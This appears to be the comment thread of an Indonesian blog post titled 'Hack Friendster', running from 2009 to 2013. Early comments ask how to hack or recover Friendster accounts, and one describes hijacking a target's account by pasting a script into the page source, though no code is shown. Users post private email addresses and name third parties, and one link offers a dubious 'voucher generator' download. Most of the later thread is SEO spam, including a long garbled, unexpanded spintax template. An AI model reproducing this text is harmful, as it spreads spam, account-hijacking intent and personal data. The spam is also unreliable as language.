zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
14 05 2009
shinichi

jGn pusing-pusing nyari tau gmn cara ng’hack FS orang ( pamali tau, husss) tp cari tau gmn cra’y kta protect FS kta byr gak di hack ma Org…

18 05 2009
anndy

pak…tolong dong dmana yah caranya ngembaliin fs cwe aku yang kena hack,..?passwordnya gtu..yang di hack..tolong… pleess… semoga allh s.w.t membalas semua kebaikan bapak…semoga ilmuna menjadi bermanfaan&bsa diamalin..khususnya bwt bpak..makash sebelumnya…aslamualaikm…

18 05 2009
AJ4L_13 » Blog Archive » Hack Friendster

[…] Hack Friendster […]

19 05 2009
anndy

oh iya alamat friendsternya… lovelly_anarchy2@yahoo.co.id makasih

26 05 2009
Doris Villanueva

Please help me to erase the profile account of my husband Jhun Lorenzo Villanueva in friendster.com becuase his profile was made by his mistress jessica sajulga and the pictures in my husband’s profile makes my children rebellious especially my eldest. They hated their father becuase of this. That’s why i am begging you to erase my husband’s profile account in friendster. Thank you.

4 06 2009
Didik

Kayaknya caranya standar bgt gw bajak cuma pake script tinggal copy tuh script dimasukin ke pagesource lu masukin scriptnya ke friendster target, nah tu friendster jd punya lw mo lw pain ke fs tu orang

16 06 2009
OBYE

ASS..
HI GWE obye…
fs gwe di hack gmn ya cr bwt fs gwe jd mlk gw lg…
sedih bged neh,,,,
udah 5 thn fs t ma aq…
plisss cr nya gmn????
krm ke fB atau email aq ya..
plis
alamatnya sama..
Intenisty@yahoo.com

18 06 2009
nanda

heheheheh pada begok lo yeeeeeeeeeeeeeeeeeeeee

18 06 2009
LhEpy

eh kasian tau anak anak yang punya fs di hack…..

mndingan kita jebolin aja password’y. . . .
heheh..
hahah..
hihihih..
hohoh..

seru jua nehh

20 06 2009
azi liorafa

klo itu sama juga mas….

ttp kasihan…haha

30 06 2009
bagosbanget

Cobain ah,,, Tengkyu atas scriptnya.

30 06 2009
bagosbanget

Tapi katanya your html script is invalid.

4 07 2009
iyut

kupengen blajar ngehack nieee

ajarin dunk

6 07 2009
SAMID

caraX bali’in fs qta yg d hack oorang gmn…?

9 07 2009
matley

thx atas info’a ..
sukses ia .

10 07 2009
maulana faris

kk gmn cara biar fotoku N tmen2 q yg kena blok balik lg seperti semula N fotonya muncul lg

14 09 2009
ilunkz

acc gw yg lama d hack.. ada yg bsa tlngn gw ga yah
email gw yg lama (reinefrdn@yahoo.com)
thanx banget yg mau bantuin gw..
maklum ga ngerti2 soal hack2an

29 10 2009
gadis

Download All voucher generator

http://www.megaupload.com/?d=B8KDBEIF

Free And Free

28 01 2010
BUJANG RIAU

hallo
Terimakasih artikelnya, salam kenal buat teman2 semua, Jangan lupa, kalau ada waktu Berkunjung ke blog Bujang Riau http://www.darma-saputra.co.cc. mari kita belajar berbisnis Ikan, terimakasih …

17 04 2010
Software Download Full Crack

thanks untuk tipsnya

9 06 2012
promo im3 anti galau

If some one wants to be updated with newest technologies then he must be pay a quick visit this web page and be up to date daily.

visit My Site

21 11 2012
canada goose

{
{I have|I’ve} been {surfing|browsing} online more than {three|3|2|4} hours today, yet I never found any interesting article like yours. {It’s|It is} pretty
worth enough for me. {In my opinion|Personally|In my view}, if all {webmasters|site
owners|website owners|web owners} and bloggers made
good content as you did, the {internet|net|web} will be {much more|a lot more} useful than ever before.
|
I {couldn’t|could not} {resist|refrain from} commenting. {Very well|Perfectly|Well|Exceptionally well} written!|
{I will|I’ll} {right away|immediately} {take hold of|grab|clutch|grasp|seize|snatch} your {rss|rss feed} as
I {can not|can’t} {in finding|find|to find} your {email|e-mail} subscription {link|hyperlink} or {newsletter|e-newsletter} service. Do {you have|you’ve} any?
{Please|Kindly} {allow|permit|let} me {realize|recognize|understand|recognise|know} {so that|in order
that} I {may just|may|could} subscribe. Thanks.
|
{It is|It’s} {appropriate|perfect|the best} time to make some plans for the future and {it is|it’s} time to
be happy. {I have|I’ve} read this post and if I could I {want to|wish to|desire to} suggest you {few|some} interesting things or {advice|suggestions|tips}. {Perhaps|Maybe} you {could|can} write next articles referring to this article. I {want to|wish to|desire to} read {more|even more} things about it!|
{It is|It’s} {appropriate|perfect|the best} time to make {a few|some} plans for {the
future|the longer term|the long run} and
{it is|it’s} time to be happy. {I have|I’ve} {read|learn} this {post|submit|publish|put up} and if I {may just|may|could} I {want to|wish to|desire to} {suggest|recommend|counsel} you
{few|some} {interesting|fascinating|attention-grabbing} {things|issues} or {advice|suggestions|tips}.
{Perhaps|Maybe} you {could|can} write {next|subsequent} articles {relating to|referring to|regarding} this article.
I {want to|wish to|desire to} {read|learn} {more|even more} {things|issues} {approximately|about} it!

|
{I have|I’ve} been {surfing|browsing} {online|on-line} {more than|greater than} {three|3} hours {these days|nowadays|today|lately|as of late}, {yet|but} I {never|by no means} {found|discovered} any {interesting|fascinating|attention-grabbing} article like yours. {It’s|It is} {lovely|pretty|beautiful} {worth|value|price} {enough|sufficient} for
me. {In my opinion|Personally|In my view}, if all {webmasters|site owners|website owners|web owners} and bloggers made {just right|good|excellent} {content|content material} as {you did|you probably did},
the {internet|net|web} {will be|shall be|might be|will
probably be|can be|will likely be} {much more|a lot more}
{useful|helpful} than ever before.|
Ahaa, its {nice|pleasant|good|fastidious} {discussion|conversation|dialogue} {regarding|concerning|about|on the topic of} this {article|post|piece of writing|paragraph}
{here|at this place} at this {blog|weblog|webpage|website|web site},
I have read all that, so {now|at this time} me also commenting {here|at this place}.
|
I am sure this {article|post|piece of writing|paragraph} has touched
all the internet {users|people|viewers|visitors}, its really
really {nice|pleasant|good|fastidious} {article|post|piece of writing|paragraph}
on building up new {blog|weblog|webpage|website|web site}.|
Wow, this {article|post|piece of writing|paragraph} is {nice|pleasant|good|fastidious}, my {sister|younger
sister} is analyzing {such|these|these kinds of} things, {so|thus|therefore} I am going to {tell|inform|let know|convey} her.
|
{Saved as a favorite|bookmarked!!}, {I really like|I
like|I love} {your blog|your site|your web site|your website}!
|
Way cool! Some {very|extremely} valid points! I appreciate you
{writing this|penning this} {article|post|write-up} {and the|and also
the|plus the} rest of the {site is|website is} {also very|extremely|very|also really|really} good.

|
Hi, {I do believe|I do think} {this is an excellent|this
is a great} {blog|website|web site|site}. I stumbledupon it ;
) {I will|I am going to|I’m going to|I may} {come back|return|revisit} {once again|yet again} {since I|since i have} {bookmarked|book marked|book-marked|saved as a favorite} it. Money and freedom {is the best|is the greatest} way to change, may you be rich and continue to {help|guide} {other people|others}.|
Woah! I’m really {loving|enjoying|digging} the template/theme of this {site|website|blog}.

It’s simple, yet effective. A lot of times it’s {very hard|very
difficult|challenging|tough|difficult|hard} to get that “perfect balance” between {superb usability|user friendliness|usability} and {visual appearance|visual appeal|appearance}.
I must say {that you’ve|you have|you’ve} done a {awesome|amazing|very good|superb|fantastic|excellent|great} job with this.
{In addition|Additionally|Also}, the blog loads {very|extremely|super} {fast|quick}
for me on {Safari|Internet explorer|Chrome|Opera|Firefox}.
{Superb|Exceptional|Outstanding|Excellent} Blog!|
These are {really|actually|in fact|truly|genuinely} {great|enormous|impressive|wonderful|fantastic} ideas in {regarding|concerning|about|on the topic
of} blogging. You have touched some {nice|pleasant|good|fastidious} {points|factors|things} here.
Any way keep up wrinting.|
{I love|I really like|I enjoy|I like|Everyone loves} what you guys {are|are usually|tend to be} up too.
{This sort of|This type of|Such|This kind of} clever work and {exposure|coverage|reporting}!
Keep up the {superb|terrific|very good|great|good|awesome|fantastic|excellent|amazing|wonderful} works guys
I’ve {incorporated||added|included} you guys to {|my|our||my personal|my own} blogroll.|
{Howdy|Hi there|Hey there|Hi|Hello|Hey}! Someone in my {Myspace|Facebook} group shared this {site|website} with us so I came to {give it a look|look it over|take a look|check it out}. I’m definitely {enjoying|loving} the information.
I’m {book-marking|bookmarking} and will be tweeting this to my followers! {Terrific|Wonderful|Great|Fantastic|Outstanding|Exceptional|Superb|Excellent} blog and {wonderful|terrific|brilliant|amazing|great|excellent|fantastic|outstanding|superb} {style and design|design and style|design}.|
{I love|I really like|I enjoy|I like|Everyone loves} what you guys {are|are usually|tend to be} up too. {This sort of|This type of|Such|This kind of} clever work and {exposure|coverage|reporting}! Keep up the {superb|terrific|very good|great|good|awesome|fantastic|excellent|amazing|wonderful} works guys I’ve {incorporated|added|included} you guys
to {|my|our|my personal|my own} blogroll.|
{Howdy|Hi there|Hey there|Hi|Hello|Hey} would you mind {stating|sharing} which blog platform you’re {working with|using}? I’m {looking|planning|going} to start my own blog {in the near future|soon} but I’m having a {tough|difficult|hard} time {making a decision|selecting|choosing|deciding} between BlogEngine/Wordpress/B2evolution and Drupal. The reason I ask is because your {design and style|design|layout} seems different then most blogs and I’m looking for
something {completely unique|unique}. P.S {My apologies|Apologies|Sorry} for
{getting|being} off-topic but I had to ask!
|
{Howdy|Hi there|Hi|Hey there|Hello|Hey} would you mind letting
me know which {webhost|hosting company|web host} you’re {utilizing|working with|using}? I’ve loaded your blog in 3 {completely different|different} {internet browsers|web browsers|browsers} and I must say this
blog loads a lot {quicker|faster} then most. Can
you {suggest|recommend} a good {internet hosting|web hosting|hosting} provider at a {honest|reasonable|fair} price?
{Thanks a lot|Kudos|Cheers|Thank you|Many thanks|Thanks},
I appreciate it!|
{I love|I really like|I like|Everyone loves} it {when people|when
individuals|when folks|whenever people} {come together|get together}
and share {opinions|thoughts|views|ideas}. Great {blog|website|site},
{keep it up|continue the good work|stick with it}!|
Thank you for the {auspicious|good} writeup. It in fact was a amusement account it.
Look advanced to {far|more} added agreeable from you!

{By the way|However}, how {can|could} we communicate?

|
{Howdy|Hi there|Hey there|Hello|Hey} just wanted to give you a quick heads up.

The {text|words} in your {content|post|article} seem to be running off the screen in {Ie|Internet explorer|Chrome|Firefox|Safari|Opera}.
I’m not sure if this is a {format|formatting} issue or something to do with {web browser|internet browser|browser} compatibility but I {thought|figured} I’d post to let you
know. The {style and design|design and style|layout|design}
look great though! Hope you get the {problem|issue} {solved|resolved|fixed} soon.
{Kudos|Cheers|Many thanks|Thanks}|
This is a topic {that is|that’s|which is} {close to|near to} my heart… {Cheers|Many thanks|Best wishes|Take care|Thank you}! {Where|Exactly where} are your contact details though?|
It’s very {easy|simple|trouble-free|straightforward|effortless} to find out any {topic|matter} on {net|web} as compared to {books|textbooks}, as I found this {article|post|piece
of writing|paragraph} at this {website|web site|site|web page}.
|
Does your {site|website|blog} have a contact page?
I’m having {a tough time|problems|trouble} locating it but, I’d like to {send|shoot} you an {e-mail|email}.
I’ve got some {creative ideas|recommendations|suggestions|ideas} for your blog you might be interested in hearing. Either way, great {site|website|blog} and I look forward to seeing it {develop|improve|expand|grow} over time.|
{Hola|Hey there|Hi|Hello|Greetings}! I’ve been {following|reading} your {site|web site|website|weblog|blog} for {a
long time|a while|some time} now and finally got the {bravery|courage}
to go ahead and give you a shout out from {New
Caney|Kingwood|Huffman|Porter|Houston|Dallas|Austin|Lubbock|Humble|Atascocita} {Tx|Texas}!
Just wanted to {tell you|mention|say} keep up the {fantastic|excellent|great|good} {job|work}!
|
Greetings from {Idaho|Carolina|Ohio|Colorado|Florida|Los angeles|California}!
I’m {bored to tears|bored to death|bored} at work so I decided to {check out|browse} your {site|website|blog} on my iphone during lunch break. I {enjoy|really like|love} the {knowledge|info|information} you {present|provide} here and can’t wait to take a look when I get home.
I’m {shocked|amazed|surprised} at how {quick|fast} your blog loaded on my {mobile|cell phone|phone} .. I’m not even using WIFI, just 3G .
. {Anyhow|Anyways}, {awesome|amazing|very good|superb|good|wonderful|fantastic|excellent|great}
{site|blog}!|
Its {like you|such as you} {read|learn} my {mind|thoughts}!

You {seem|appear} {to understand|to know|to grasp} {so much|a lot}
{approximately|about} this, {like you|such as you} wrote the
{book|e-book|guide|ebook|e book} in it or something.

{I think|I feel|I believe} {that you|that you simply|that you just} {could|can}
do with {some|a few} {%|p.c.|percent} to {force|pressure|drive|power} the message {house|home} {a bit|a little bit}, {however|but} {other than|instead of} that, {this is|that is} {great|wonderful|fantastic|magnificent|excellent} blog. {A great|An excellent|A fantastic} read. {I’ll|I will} {definitely|certainly} be back.|
I visited {multiple|many|several|various} {websites|sites|web sites|web pages|blogs} {but|except|however} the audio {quality|feature} for audio songs {current|present|existing} at this {website|web site|site|web page} is {really|actually|in fact|truly|genuinely} {marvelous|wonderful|excellent|fabulous|superb}.|
{Howdy|Hi there|Hi|Hello}, i read your blog {occasionally|from time to time} and i own a similar one and i was just {wondering|curious} if you get a lot of spam {comments|responses|feedback|remarks}? If so how do you {prevent|reduce|stop|protect against} it, any plugin or anything you can {advise|suggest|recommend}? I get so much lately it’s driving me {mad|insane|crazy} so any {assistance|help|support} is very much appreciated.|
Greetings! {Very helpful|Very useful} advice {within this|in this particular} {article|post}! {It is the|It’s the} little changes {that make|which will make|that produce|that will make} {the biggest|the largest|the greatest|the most important|the most significant} changes. {Thanks a lot|Thanks|Many thanks} for sharing!|
{I really|I truly|I seriously|I absolutely} love {your blog|your site|your website}.. {Very nice|Excellent|Pleasant|Great} colors & theme. Did you {create|develop|make|build} {this website|this site|this web site|this amazing site} yourself? Please reply back as I’m {looking to|trying to|planning to|wanting to|hoping to|attempting to} create {my own|my very own|my own personal} {blog|website|site} and {would like to|want to|would love to} {know|learn|find out} where you got this from or {what the|exactly what the|just what the} theme {is called|is named}. {Thanks|Many thanks|Thank you|Cheers|Appreciate it|Kudos}!|
{Hi there|Hello there|Howdy}! This {post|article|blog post} {couldn’t|could not} be written {any better|much better}! {Reading through|Looking at|Going through|Looking through} this {post|article} reminds me of my previous roommate! He {always|constantly|continually} kept {talking about|preaching about} this. {I will|I’ll|I am going to|I most certainly will} {forward|send} {this article|this information|this post} to him. {Pretty sure|Fairly certain} {he will|he’ll|he’s going to} {have a good|have a very good|have a great} read. {Thank you for|Thanks for|Many thanks for|I appreciate you for} sharing!|
{Wow|Whoa|Incredible|Amazing}! This blog looks {exactly|just} like my old one! It’s on a {completely|entirely|totally} different {topic|subject} but it has pretty much the same {layout|page layout} and design. {Excellent|Wonderful|Great|Outstanding|Superb} choice of colors!|
{There is|There’s} {definately|certainly} {a lot to|a great deal to} {know about|learn about|find out about} this {subject|topic|issue}. {I like|I love|I really like} {all the|all of the} points {you made|you’ve made|you have made}.|
{You made|You’ve made|You have made} some {decent|good|really good} points there. I {looked|checked} {on the internet|on the web|on the net} {for more info|for more information|to find out more|to learn more|for additional information} about the issue and found {most individuals|most people} will go along with your views on {this website|this site|this web site}.|
{Hi|Hello|Hi there|What’s up}, I {log on to|check|read} your {new stuff|blogs|blog} {regularly|like every week|daily|on a regular basis}. Your {story-telling|writing|humoristic} style is {awesome|witty}, keep {doing what you’re doing|up the good work|it up}!|
I {simply|just} {could not|couldn’t} {leave|depart|go away} your {site|web site|website} {prior to|before} suggesting that I {really|extremely|actually} {enjoyed|loved} {the standard|the usual} {information|info} {a person|an individual} {supply|provide} {for your|on your|in your|to your} {visitors|guests}? Is {going to|gonna} be {back|again} {frequently|regularly|incessantly|steadily|ceaselessly|often|continuously} {in order to|to} {check up on|check out|inspect|investigate cross-check} new posts|
{I wanted|I needed|I want to|I need to} to thank you for this {great|excellent|fantastic|wonderful|good|very good} read!! I {definitely|certainly|absolutely} {enjoyed|loved} every {little bit of|bit of} it. {I have|I’ve got|I have got} you {bookmarked|book marked|book-marked|saved as a favorite} {to check out|to look at} new {stuff you|things you} post…|
{Hi|Hello|Hi there|What’s up}, just wanted to {mention|say|tell you}, I {enjoyed|liked|loved} this {article|post|blog post}. It was {inspiring|funny|practical|helpful}. Keep on posting!|
I {{leave|drop|{write|create}} a {comment|leave a response}|drop a {comment|leave a response}|{comment|leave a response}} {each time|when|whenever} I {appreciate|like|especially enjoy} a {post|article} on a {site|{blog|website}|site|website} or {I have|if I have} something to {add|contribute|valuable to contribute} {to the discussion|to the conversation}. {It is|Usually it is|Usually it’s|It’s} {a result of|triggered by|caused by} the {passion|fire|sincerness} {communicated|displayed} in the {post|article} I {read|looked at|browsed}. And {on|after} this {post|article} Hack Friendster diR. I {{was|was actually} moved|{was|was actually} excited} enough to {drop|{leave|drop|{write|create}}|post} a {thought|{comment|{comment|leave a response}a response}} {:-P|:)|;)|;-)|:-)} I {do have|actually do have} {{some|a few} questions|a couple of questions|2 questions} for you {if you {don’t|do not|usually do not|tend not to} mind|if it’s {allright|okay}}. {Is it|Could it be} {just|only|simply} me or {do|does it {seem|appear|give the impression|look|look as if|look like} like} {some|a few} of {the|these} {comments|responses|remarks} {look|appear|come across} {like they are|as if they are|like} {coming from|written by|left by} brain dead {people|visitors|folks|individuals}?😛 And, if you are {posting|writing} {on|at} {other|additional} {sites|social sites|online sites|online social sites|places}, {I’d|I would} like to {follow|keep up with} {you|{anything|everything} {new|fresh} you have to post}. {Could|Would} you {list|make a list} {all|every one|the complete urls} of {your|all your} {social|communal|community|public|shared} {pages|sites} like your {twitter feed, Facebook page or linkedin profile|linkedin profile, Facebook page or twitter feed|Facebook page, twitter feed, or linkedin profile}?|
{Hi there|Hello}, I enjoy reading {all of|through} your {article|post|article post}. I {like|wanted} to write a little comment to support you.|
I {always|constantly|every time} spent my half an hour to read this {blog|weblog|webpage|website|web site}’s {articles|posts|articles or reviews|content} {everyday|daily|every day|all the time} along with a {cup|mug} of coffee.|
I {always|for all time|all the time|constantly|every time} emailed this {blog|weblog|webpage|website|web site} post page to all my {friends|associates|contacts}, {because|since|as|for the reason that} if like to read it {then|after that|next|afterward} my {friends|links|contacts} will too.|
My {coder|programmer|developer} is trying to {persuade|convince} me to move to .net from PHP. I have always disliked the idea because of the {expenses|costs}. But he’s tryiong none the less. I’ve been using {Movable-type|WordPress} on {a number of|a variety of|numerous|several|various} websites for about a year and am {nervous|anxious|worried|concerned} about switching to another platform. I have heard {fantastic|very good|excellent|great|good} things about blogengine.net. Is there a way I can {transfer|import} all my wordpress {content|posts} into it? {Any kind of|Any} help would be {really|greatly} appreciated!|
{Hello|Hi|Hello there|Hi there|Howdy|Good day}! I could have sworn I’ve {been to|visited} {this blog|this web site|this website|this site|your blog} before but after {browsing through|going through|looking at} {some of the|a few of the|many of the} {posts|articles} I realized it’s new to me. {Anyways|Anyhow|Nonetheless|Regardless}, I’m {definitely|certainly} {happy|pleased|delighted} {I found|I discovered|I came across|I stumbled upon} it and I’ll be {bookmarking|book-marking} it and checking back {frequently|regularly|often}!|
{Terrific|Great|Wonderful} {article|work}! {This is|That is} {the type of|the kind of} {information|info} {that are meant to|that are supposed to|that should} be shared {around the|across the} {web|internet|net}. {Disgrace|Shame} on {the {seek|search} engines|Google} for {now not|not|no longer} positioning this {post|submit|publish|put up} {upper|higher}! Come on over and {talk over with|discuss with|seek advice from|visit|consult with} my {site|web site|website} . {Thank you|Thanks} =)|
Heya {i’m|i am} for the first time here. I {came across|found} this board and I find It {truly|really} useful & it helped me out {a lot|much}. I hope to give something back and {help|aid} others like you {helped|aided} me.|
{Hi|Hello|Hi there|Hello there|Howdy|Greetings}, {I think|I believe|I do believe|I do think|There’s no doubt that} {your site|your website|your web site|your blog} {might be|may be|could be|could possibly be} having {browser|internet browser|web browser} compatibility {issues|problems}. {When I|Whenever I} {look at your|take a look at your} {website|web site|site|blog} in Safari, it looks fine {but when|however when|however, if|however, when} opening in {Internet Explorer|IE|I.E.}, {it has|it’s got} some overlapping issues. {I just|I simply|I merely} wanted to {give you a|provide you with a} quick heads up! {Other than that|Apart from that|Besides that|Aside from that}, {fantastic|wonderful|great|excellent} {blog|website|site}!|
{A person|Someone|Somebody} {necessarily|essentially} {lend a hand|help|assist} to make {seriously|critically|significantly|severely} {articles|posts} {I would|I might|I’d} state. {This is|That is} the {first|very first} time I frequented your {web page|website page} and {to this point|so far|thus far|up to now}? I {amazed|surprised} with the {research|analysis} you made to {create|make} {this actual|this particular} {post|submit|publish|put up} {incredible|amazing|extraordinary}. {Great|Wonderful|Fantastic|Magnificent|Excellent} {task|process|activity|job}!|
Heya {i’m|i am} for {the primary|the first} time here. I {came across|found} this board and I {in finding|find|to find} It {truly|really} {useful|helpful} & it helped me out {a lot|much}. {I am hoping|I hope|I’m hoping} {to give|to offer|to provide|to present} {something|one thing} {back|again} and {help|aid} others {like you|such as you} {helped|aided} me.|
{Hello|Hi|Hello there|Hi there|Howdy|Good day|Hey there}! {I just|I simply} {would like to|want to|wish to} {give you a|offer you a} {huge|big} thumbs up {for the|for your} {great|excellent} {info|information} {you have|you’ve got|you have got} {here|right here} on this post. {I will be|I’ll be|I am} {coming back to|returning to} {your blog|your site|your website|your web site} for more soon.|
I {always|all the time|every time} used to {read|study} {article|post|piece of writing|paragraph} in news papers but now as I am a user of {internet|web|net} {so|thus|therefore} from now I am using net for {articles|posts|articles or reviews|content}, thanks to web.|
Your {way|method|means|mode} of {describing|explaining|telling} {everything|all|the whole thing} in this {article|post|piece of writing|paragraph} is {really|actually|in fact|truly|genuinely} {nice|pleasant|good|fastidious}, {all|every one} {can|be able to|be capable of} {easily|without difficulty|effortlessly|simply} {understand|know|be aware of} it, Thanks a lot.|
{Hi|Hello} there, {I found|I discovered} your {blog|website|web site|site} {by means of|via|by the use of|by way of} Google {at the same time as|whilst|even as|while} {searching for|looking for} a {similar|comparable|related} {topic|matter|subject}, your {site|web site|website} {got here|came} up, it {looks|appears|seems|seems to be|appears to be like} {good|great}. {I have|I’ve} bookmarked it in my google bookmarks.
{Hello|Hi} there, {simply|just} {turned into|became|was|become|changed into} {aware of|alert to} your {blog|weblog} {thru|through|via} Google, {and found|and located} that {it is|it’s} {really|truly} informative. {I’m|I am} {gonna|going to} {watch out|be careful} for brussels. {I will|I’ll} {appreciate|be grateful} {if you|should you|when you|in the event you|in case you|for those who|if you happen to} {continue|proceed} this {in future}. {A lot of|Lots of|Many|Numerous} {other folks|folks|other people|people} {will be|shall be|might be|will probably be|can be|will likely be} benefited {from your|out of your} writing. Cheers!|
{I am|I’m} curious to find out what blog {system|platform} {you have been|you happen to be|you are|you’re} {working with|utilizing|using}? I’m {experiencing|having} some {minor|small} security {problems|issues} with my latest {site|website|blog} and {I would|I’d} like to find something more {safe|risk-free|safeguarded|secure}. Do you have any {solutions|suggestions|recommendations}?|
{I am|I’m} {extremely|really} impressed with your writing skills {and also|as well as} with the layout on your {blog|weblog}. Is this a paid theme or did you {customize|modify} it yourself? {Either way|Anyway} keep up the {nice|excellent} quality writing, {it’s|it is} rare to see a {nice|great} blog like this one {these days|nowadays|today}.|
{I am|I’m} {extremely|really} {inspired|impressed} {with your|together with your|along with your} writing {talents|skills|abilities} {and also|as {smartly|well|neatly} as} with the {layout|format|structure} {for your|on your|in your|to your} {blog|weblog}. {Is this|Is that this} a paid {subject|topic|subject matter|theme} or did you {customize|modify} it {yourself|your self}? {Either way|Anyway} {stay|keep} up the {nice|excellent} {quality|high quality} writing, {it’s|it is} {rare|uncommon} {to peer|to see|to look} a {nice|great} {blog|weblog} like this one {these days|nowadays|today}..|
{Hi|Hello}, Neat post. {There is|There’s} {a problem|an issue} {with your|together with your|along with your} {site|web site|website} in {internet|web} explorer, {may|might|could|would} {check|test} this? IE {still|nonetheless} is the {marketplace|market} {leader|chief} and {a large|a good|a big|a huge} {part of|section of|component to|portion of|component of|element of} {other folks|folks|other people|people} will {leave out|omit|miss|pass over} your {great|wonderful|fantastic|magnificent|excellent} writing {due to|because of} this problem.|
{I’m|I am} not sure where {you are|you’re} getting your {info|information}, but {good|great} topic. I needs to spend some time learning {more|much more} or understanding more. Thanks for {great|wonderful|fantastic|magnificent|excellent} {information|info} I was looking for this {information|info} for my mission.|
{Hi|Hello}, i think that i saw you visited my {blog|weblog|website|web site|site} {so|thus} i came to “return the favor”.{I am|I’m} {trying to|attempting to} find things to {improve|enhance} my {website|site|web site}!I suppose its ok to use {some of|a few of} your ideas!!\

24 01 2013
fa

Hello, Neat post. There’s an issue with your web site in internet explorer, may test this? IE nonetheless is the market leader and a big part of other people will miss your great writing because of this problem.

1 02 2013
sa

Hi, Neat post. There is a problem together with your site in web explorer, could test this? IE nonetheless is the market leader and a big portion of other people will miss your wonderful writing due to this problem.

5 02 2013
bunga anggrek, cara merawat anggrek, tanaman hias

I’ve been exploring for a bit for any high quality articles or blog posts in this kind of house . Exploring in Yahoo I eventually stumbled upon this site. Studying this info So i am glad to convey that I’ve an incredibly good uncanny feeling I discovered just what I needed. I such a lot indisputably will make certain to do not fail to remember this web site and give it a look regularly.

16 02 2013
clean

Thank you for some other informative web site. The place else may I get that type of information written in such an ideal approach? I have a project that I am simply now operating on, and I have been on the look out for such info.

16 02 2013
read

You are really a excellent webmaster. The web site loading pace is incredible. It sort of feels that you are doing any unique trick. Also, The contents are masterpiece. you have done a fantastic activity in this subject!

12 03 2013
Melody

Surfing around delicious.com I noticed your web site bookmarked as: Hack Friendster | diR.
I am assuming you bookmarked it yourself and wanted to
ask if social bookmarking gets you a large amount of site visitors?
I’ve been contemplating doing some social bookmarking for a few of my websites but wasn’t sure if it would produce any positive
results. Thank you very much.

13 03 2013
ther

Thanks a bunch for sharing this with all people you actually know what you are speaking approximately! Bookmarked. Please additionally discuss with my website =). We can have a link exchange agreement among us

14 03 2013
kery

I do not even know how I ended up right here, however I believed this put up was great. I don’t recognize who you might be but definitely you’re going to a famous blogger should you aren’t already. Cheers!

20 03 2013
ner

I have been exploring for a little for any high-quality articles or weblog posts in this kind of house . Exploring in Yahoo I finally stumbled upon this site. Reading this information So i am satisfied to express that I have a very good uncanny feeling I found out exactly what I needed. I most indubitably will make certain to don?t disregard this web site and give it a look on a relentless basis.

27 03 2013
daugh

Thanks for the auspicious writeup. It in reality was a enjoyment account it. Glance complicated to far delivered agreeable from you! However, how can we keep up a correspondence?

4 04 2013
dish

Heya i’m for the first time here. I found this board and I in finding It really helpful & it helped me out a lot. I hope to offer something again and aid others like you aided me.

18 04 2013
watch simpsons online

Some from the most productive cartoon marketing
promotions are those which run inside series.
The episodes for Robot Chicken are simply 15 minutes long
however they are jam packed with every possible parody recognized to man.
Adjustments inside program and especially the composing
lineup appear to have arrive to not good as of late, along with the disappointing ‘Simpsons Movie’ left several supporters wondering ‘why.

5 05 2013
nike free 4.0 v2

I really like your blog.. very nice colors & theme.
Did you design this website yourself or did you hire someone to do it for you?
Plz reply as I’m looking to create my own blog and would like to know where u got this from. cheers

20 05 2013
na

Thank you, I’ve recently been searching for info approximately this topic for a long time and yours is the greatest I’ve discovered till now. But, what concerning the bottom line? Are you positive in regards to the source?|What i do not realize is actually how you are not really much more well-appreciated than you might be now. You are very intelligent.

30 06 2013
Youtube.com

I was suggested this website by my cousin.
I’m not sure whether this post is written by him as nobody else know such detailed about my trouble. You’re wonderful!
Thanks!

12 07 2013
Sophie

First off I want to say superb blog! I had a quick question
in which I’d like to ask if you don’t mind.

I was curious to find out how you center yourself and clear
your head prior to writing. I’ve had a hard time clearing my mind in getting my ideas out there. I do take pleasure in writing but it just seems like the first 10 to 15 minutes are wasted just trying to figure out how to begin. Any ideas or hints? Many thanks!

17 07 2013
How to lose weight

Apart from just buying wholesale items, you can also plan to set up a wholesale
clothing business. Many wholesale suppliers require a minimum order of 200 pieces, for example, but others only require less than 10 pieces per order.

The time you kept aside to get a new look is now almost
consumed by your boss.

17 07 2013
no carb diet

Hello There. I found your blog the usage of msn. That is
an extremely smartly written article. I will be sure to bookmark
it and return to learn extra of your useful info.
Thanks for the post. I will definitely comeback.

17 07 2013
fat burning foods dietitian

I think the admin of this web site is truly working
hard in favor of his site, since here every information is quality based data.

17 07 2013
Buy Gold Bars

Hi there, I discovered your web site by means of Google even
as searching for a comparable subject, your site came up, it
seems to be great. I have bookmarked it in my google bookmarks.

Hi there, just became aware of your blog via Google, and located that
it’s really informative. I’m gonna watch out for brussels.
I’ll be grateful should you proceed this in future. Many people will likely be benefited out of your writing. Cheers!

18 07 2013
Gwendolyn

I was recommended this web site by my cousin. I am not sure whether this
post is written by him as nobody else know such detailed about
my difficulty. You’re amazing! Thanks!

18 07 2013
Buy Silver Online

My brother recommended I might like this website. He was
entirely right. This post actually made my day.
You can not imagine just how much time I had spent for this info!
Thanks!

23 07 2013
Senibong Cove

Hi, after reading this awesome article i am as well delighted
to share my familiarity here with colleagues.

28 07 2013
Jerri

Aw, this was an incredibly good post. Spending some time and actual effort
to create a superb article… but what can I say… I hesitate
a whole lot and never manage to get nearly anything done.
